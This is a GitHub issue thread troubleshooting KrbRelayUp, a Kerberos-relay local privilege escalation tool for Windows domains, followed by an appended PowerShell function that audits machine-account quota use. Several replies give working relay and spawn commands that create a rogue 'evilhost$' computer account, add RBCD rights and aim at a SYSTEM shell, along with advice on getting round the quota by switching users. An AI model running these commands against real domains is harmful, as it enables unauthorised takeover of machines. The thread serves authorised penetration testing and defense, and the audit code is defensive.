Dec0ne / KrbRelayUp

KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).


Could not find computer account SID:

dreizehnutters opened this issue · comments


Hey,

I just tried the POC for a customer. Unfortunately the method does not seem to work on the Windows 10 Enterprise 19042 client.
LDAP signing is disabled

[screenshot: KrbRelayUp_fail]

Are you sure you used the FQDN for -Domain? I get this error if the Domain is not correct (i.e. using windomain when it should be windomain.local)

I had this issue, started working after a reboot.

Same issue here. Let's say I have a host=laptop123 on AD domain=mycompany.com; I tried the following, and neither works:
KrbRelayUp.exe relay -d laptop123.local -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
[+] Computer account "evilhost$" added with password "pass0123"
[-] Could not find computer account SID:
[-] Index was out of range. Must be non-negative and less than the size of the collection.
Parameter name: index
KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost$ -ComputerPassword pass0123
[-] Could not add new computer account:
[-] The user has insufficient access rights.
Help?


In the first command your domain was incorrect, so it couldn't find the SID of the new computer in that domain (because it doesn't exist there), which is why it failed.
In the second command the domain flag was correct, but it couldn't add the "evilhost$" computer because it already exists (it was added in the first command).
Try either removing -CreateNewComputerAccount from the second command or specifying a new -ComputerName:

  • KrbRelayUp.exe relay -d mycompany.com -ComputerName evilhost$ -ComputerPassword pass0123
  • KrbRelayUp.exe relay -d mycompany.com -CreateNewComputerAccount -ComputerName evilhost222$ -ComputerPassword pass0123

In the next version (should be out this week) the tool will lookup the domain by itself so this kind of confusion would be less likely to happen again.

Tried two revisions, getting the same error:
[-] Could not add new computer account:
[-] The user has insufficient access rights.
Do I have to be a Windows local admin (run as admin) for the command? Tried that, it does not help either.
Is there any debug/log option I can turn on for troubleshooting? Regarding domain lookup, is it just:
PS>systeminfo | Select-String 'Domain'
which I used here.

I pulled the latest, re-ran the executable and noticed the following option disappearing:
-c (--CreateNewComputerAccount)
Assuming I am running the executable from the existing laptop123 that I own:
.\KrbRelayUp.exe relay -d mycompany.com -cn laptop123$ -cp pass0123
[+] Rewriting function table
[+] Rewriting PEB
[+] Init COM server
[+] Register COM server
[+] Forcing SYSTEM authentication
[+] Got Krb Auth from NT/SYSTEM. Relying to LDAP now...
[+] LDAP session established
[+] RBCD rights added successfully
[+] Run the spawn method for SYSTEM shell:
./KrbRelayUp spawn -d mycompany.com -cn laptop123$ -cp pass0123
However, when running the last suggested command, I am getting the following error:
KrbRelayUp - Relaying you to SYSTEM
[-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED:
Do I have to do anything about laptop's firewall? I can verify AD server port 389/88 are all open. Anything else I need to check?

[-] KRB-ERROR (24) : KDC_ERR_PREAUTH_FAILED means that the password specified for the laptop123$ machine account is incorrect.

The -cn and -cp flags are for the separate machine account you own, or the one you added if you specified -c to create a new one (not the one you are executing KrbRelayUp from).

Run those 2 commands and it should work:

  • .\KrbRelayUp.exe relay -d mycompany.com -c -cn newcomputer$ -cp newpass0123
  • .\KrbRelayUp.exe spawn -d mycompany.com -cn newcomputer$ -cp newpass0123

When running the following command to create a new computer account (-c):
\KrbRelayUp.exe relay -d mycompany.com -c -cn newcomputer$ -cp newpass0123
I fall back to the old error below (still not sure what is causing the problem without debug/logs):
KrbRelayUp - Relaying you to SYSTEM
[-] Could not add new computer account:
[-] The user has insufficient access rights.

Insufficient privileges to add a computer account is usually due to either a restriction in the domain where regular users are not allowed to add a new machine account (this is actually one of the mitigation suggestions for this attack), or because your user has reached the maximum quota of new computer accounts it may add, which is 10 by default (this is my guess for your specific issue).
You can either delete, via a domain admin from the DC, all of the computer accounts you've added, which will reset your user's quota so you can perform the attack again, or use another domain user to perform the attack with.

I verified:

  1. AD ldap:// is bind-able on 389, assuming LDAP signing is NOT enforced (default).
  2. Queried 'ms-DS-MachineAccountQuota', which is 10 (default), as follows:
    PS>Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
    DistinguishedName : DC=xxx,DC=xxx,DC=xxx,DC=xxx
    ms-DS-MachineAccountQuota : 10
    Name : corp
    ObjectClass : domainDNS
    ObjectGUID : xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

How do I query AD to see if I have reached my quota? I have seen the following error 10+ times though:
    [+]Computer account "evilhost$" added with password xxxx
    [-]Could not find computer account SID:
Does this mean 'evilhost' was successfully added? If so, how do I AD-query for it?
The Windows machine running the script has the full DN: CN=laptop123,OU=xxx,OU=xxx,DC=xxx,DC=xxx,DC=xxx,DC=xxx
Do I have to provide KrbRelayUp with the full DN, like -cn CN=evilhost,OU=xxx,....? Please advise. Thx

Could you check the previous commands using a new low-priv user? (which probably still hasn't reached its ms-DS-MachineAccountQuota limit)
Another route you could take is logging in to your DC using a domain admin and manually deleting all of the machine accounts added by the previous KrbRelayUp runs; this will let your user add new machine accounts again.
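The thread's two open questions (how to tell whether a user has exhausted ms-DS-MachineAccountQuota, and how to find the computer objects that user already created so an admin can review or remove them) can be answered from the DC side. The following is an added example, not code from the thread or from the KrbRelayUp project; it assumes the RSAT ActiveDirectory module on a domain-joined admin workstation and uses a placeholder user name.

```powershell
# Added example (not from the thread): audit a user's consumption of
# ms-DS-MachineAccountQuota and list the computer objects it created.
# Assumes the RSAT ActiveDirectory module; 'jdoe' below is a placeholder.
Import-Module ActiveDirectory

function Get-MachineAccountQuotaUsage {
    param(
        [Parameter(Mandatory)] [string] $SamAccountName
    )
    $domain = Get-ADDomain
    $quota  = (Get-ADObject -Identity $domain.DistinguishedName `
                -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
    $userSid = (Get-ADUser -Identity $SamAccountName).SID

    # A computer object joined by a non-admin under the quota records the
    # creator's SID in mS-DS-CreatorSID (a byte array); objects created by
    # accounts holding the Create Child right do not carry this attribute,
    # so the LDAP filter below only returns quota-backed joins.
    $created = Get-ADComputer -LDAPFilter '(mS-DS-CreatorSID=*)' `
                   -Properties 'mS-DS-CreatorSID' |
        Where-Object {
            $creator = New-Object System.Security.Principal.SecurityIdentifier(
                           $_.'mS-DS-CreatorSID', 0)
            $creator -eq $userSid
        }

    [pscustomobject]@{
        User      = $SamAccountName
        Quota     = $quota
        Used      = @($created).Count
        Exhausted = (@($created).Count -ge $quota)
        Computers = @($created | Select-Object -ExpandProperty Name)
    }
}

# Placeholder user. Entries in .Computers are the objects a domain admin
# would review: remove them to reset the quota, or treat unexpected names
# (such as "evilhost$") as a signal that a relay attempt took place.
Get-MachineAccountQuotaUsage -SamAccountName 'jdoe' | Format-List
```

The mitigation mentioned above (regular users not allowed to add machine accounts) corresponds to setting ms-DS-MachineAccountQuota to 0 on the domain object, after which this function will report Exhausted for every unprivileged user.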